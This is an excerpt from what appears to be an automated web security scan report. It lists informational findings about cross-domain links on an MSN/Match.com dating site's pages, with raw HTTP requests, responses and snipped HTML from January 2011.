Confidence:	Certain
Host:	http://dating.redacted
Path:	/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/ad/static/47891/280x115_FT.gif
http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/index/47981/btn.gif
http://cp.match.com/cppp/msn/index/47981/chemarr.gif
http://cp.match.com/cppp/msn/index/55688/chem1.jpg
http://cp.match.com/cppp/msn/index/56452/56452.css
http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.shuffle.js
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://images.match.com/match/matchscene/articles/spotlight100_24673.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24674.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24675.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24676.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24678.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24679.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24680.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24681.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24682.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24684.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24685.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24686.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24687.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24688.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24689.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24690.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24691.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24692.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24695.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24779.jpg
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369
http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368
http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN
http://www.myhomeredacted/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /index.aspx?TrackingID=516163&BannerID=670269 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:48 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=f6039d13-3143-4ac4-a040-dd7633dc19c3; expires=Sun, 29-Jan-2012 23:45:48 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=1329be66-3f67-48b2-8a8b-9bf49c7bbe5b&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/index/56452/56452.css" rel="stylesheet" type="text/css" />
<style>
...[SNIP]...
<noscript><img
src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li id="navChemistry"><a href="http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368">Chemistry</a>
...[SNIP]...
<div id="pnlButton"> <img src="http://cp.match.com/cppp/msn/index/47981/btn.gif" width="208" height="36" alt="View Photos »" class="btnQuickSearch" />
<input type="hidden" name="po" value="1" id="po"/>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24684.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24673.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24685.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24674.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24686.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24675.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24687.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24676.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24688.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24678.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24689.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24679.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24690.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24680.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24691.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24681.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24692.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24682.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24779.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24695.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<p><a href="http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010">Member Sign In »</a>
...[SNIP]...
<div id="arr"><img src="http://cp.match.com/cppp/msn/index/47981/chemarr.gif" width="7" height="11" border="0" /></div>
...[SNIP]...
<div id="opts"><a href="http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369" target="_blank"><img src="http://cp.match.com/cppp/msn/index/55688/chem1.jpg" width="598" height="141" border="0" /></a>
...[SNIP]...
<a href="/promo/msn72HrsFree2010"><img src="http://cp.match.com/cppp/msn/ad/static/47891/280x115_FT.gif" width="280" height="115" border="0" /></a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li class="last"> Follow MSN on <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Facebook</a> | <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Twitter</a>
...[SNIP]...

22.66. http://dating.redacted/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/ad/static/54185windowsphone7.gif
http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/index/47981/btn.gif
http://cp.match.com/cppp/msn/index/47981/chemarr.gif
http://cp.match.com/cppp/msn/index/55688/chem1.jpg
http://cp.match.com/cppp/msn/index/56452/56452.css
http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.shuffle.js
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://images.match.com/match/matchscene/articles/spotlight100_24673.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24674.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24675.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24676.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24678.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24679.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24680.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24681.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24682.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24684.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24685.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24686.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24687.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24688.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24689.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24690.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24691.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24692.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24695.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24779.jpg
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369
http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368
http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN
http://www.myhomeredacted/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /index.aspx?TrackingID=516163&BannerID=670269 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:43:51 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:43:50 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:43:50 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=57b51d72-4ae5-4580-b5e3-4d6f6053acaf; expires=Mon, 30-Jan-2012 16:43:50 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=abea2b79-7aba-4005-91f1-08deb2cdba45&THEME=83; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43968

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/index/56452/56452.css" rel="stylesheet" type="text/css" />
<style>
...[SNIP]...
<noscript><img
src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li id="navChemistry"><a href="http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368">Chemistry</a>
...[SNIP]...
<div id="pnlButton"> <img src="http://cp.match.com/cppp/msn/index/47981/btn.gif" width="208" height="36" alt="View Photos »" class="btnQuickSearch" />
<input type="hidden" name="po" value="1" id="po"/>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24684.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24673.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24685.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24674.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24686.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24675.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24687.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24676.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24688.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24678.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24689.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24679.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24690.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24680.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24691.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24681.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24692.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24682.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24779.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<a href="" class="sptLink"><img src="http://images.match.com/match/matchscene/articles/spotlight100_24695.jpg" width="96" height="96" border="0" /></a>
...[SNIP]...
<p><a href="http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010">Member Sign In »</a>
...[SNIP]...
<div id="arr"><img src="http://cp.match.com/cppp/msn/index/47981/chemarr.gif" width="7" height="11" border="0" /></div>
...[SNIP]...
<div id="opts"><a href="http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369" target="_blank"><img src="http://cp.match.com/cppp/msn/index/55688/chem1.jpg" width="598" height="141" border="0" /></a>
...[SNIP]...
<a href="/windowsphone"><img src="http://cp.match.com/cppp/msn/ad/static/54185windowsphone7.gif" width="279" height="115" border="0" /></a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li class="last"> Follow MSN on <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Facebook</a> | <a href="http://www.followredacted/?ocid=TXT_MSNCH_DATING_FollowMSN">Twitter</a>
...[SNIP]...

22.67. http://dating.redacted/search/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.redacted
Path:	/search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.redacted/search/index.aspx?TrackingID=526133&BannerID=722765&q=man,woman,18,35&gt1=26000

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://download.live.com/?sku=messenger
http://images.match.com/match/doubleblind/xCloseModal.gif
http://images.match.com/match/footer/ico_blg.gif
http://images.match.com/match/footer/ico_fb.gif
http://images.match.com/match/footer/ico_twtr.gif
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif
http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif
http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif
http://images.match.com/match/search/redesign/quickSearchBtn.gif
http://images.match.com/match/search/v2/goBtn.gif
http://match.mediaroom.com/?lid=4
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://sthumbnails.match.com/sthumbnails/00/73/98910073C.jpeg
http://sthumbnails.match.com/sthumbnails/04/18/98900418A.jpeg
http://sthumbnails.match.com/sthumbnails/08/25/57690825B.jpeg
http://sthumbnails.match.com/sthumbnails/11/13/98911113A.jpeg
http://sthumbnails.match.com/sthumbnails/13/13/98351313A.jpeg
http://sthumbnails.match.com/sthumbnails/14/02/98901402C.jpeg
http://sthumbnails.match.com/sthumbnails/25/60/98872560A.jpeg
http://sthumbnails.match.com/sthumbnails/30/93/72343093D.jpeg
http://sthumbnails.match.com/sthumbnails/34/36/98903436A.jpeg
http://sthumbnails.match.com/sthumbnails/37/44/98893744A.jpeg
http://sthumbnails.match.com/sthumbnails/41/48/98874148F.jpeg
http://sthumbnails.match.com/sthumbnails/42/17/98904217A.jpeg
http://sthumbnails.match.com/sthumbnails/42/55/98904255A.jpeg
http://sthumbnails.match.com/sthumbnails/52/09/75345209A.jpeg
http://sthumbnails.match.com/sthumbnails/70/40/98277040A.jpeg
http://sthumbnails.match.com/sthumbnails/71/20/98127120A.jpeg
http://sthumbnails.match.com/sthumbnails/71/74/98907174B.jpeg
http://sthumbnails.match.com/sthumbnails/78/24/98887824B.jpeg
http://sthumbnails.match.com/sthumbnails/78/66/98887866A.jpeg
http://sthumbnails.match.com/sthumbnails/80/94/98868094B.jpeg
http://sthumbnails.match.com/sthumbnails/85/60/98868560A.jpeg
http://sthumbnails.match.com/sthumbnails/86/18/98728618J.jpeg
